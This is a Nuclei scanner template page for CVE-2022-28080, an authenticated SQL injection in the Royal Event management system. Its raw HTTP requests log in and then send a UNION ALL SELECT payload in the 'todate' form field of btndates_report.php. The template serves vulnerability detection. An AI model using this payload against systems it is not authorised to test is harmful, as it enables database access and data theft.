Skip to content
Nuclei Templates

Royal Event - SQL Injection

ID: CVE-2022-28080

Severity: high

Author: lucasljm2001,ekrause,ritikchaddha

Tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project

Description

Section titled “Description”

Royal Event is vulnerable to a SQL injection vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2022-28080


info:
  name: Royal Event - SQL Injection
  author: lucasljm2001,ekrause,ritikchaddha
  severity: high
  description: |
    Royal Event is vulnerable to a SQL injection vulnerability.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database.
  remediation: |
    To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.
  reference:
    - https://www.exploit-db.com/exploits/50934
    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
    - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28080
    - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-28080
    cwe-id: CWE-89
    epss-score: 0.01814
    epss-percentile: 0.88161
    cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: event_management_system_project
    product: event_management_system
  tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project


http:
  - raw:
      - |
        POST /royal_event/ HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 353
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD


        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="username"


        {{username}}
        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="password"


        {{password}}
        ------WebKitFormBoundaryCSxQll1eihcqgIgD
        Content-Disposition: form-data; name="login"




        ------WebKitFormBoundaryCSxQll1eihcqgIgD--
      - |
        POST /royal_event/btndates_report.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD


        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="todate"


        1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="search"


        3
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="fromdate"


        01/01/2011
        ------WebKitFormBoundaryFboH5ITu7DsGIGrD--


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5("{{randstr}}")}}'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f5aaa37bb33dea6d3239df88f4e2206f423aa743740ba4f4882f3a18b950d0db0221008b2424f514b5d480f7eb13e4b5f6996135932925721a66ce68bb4bda4ea8ec6d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28080.yaml"

View on Github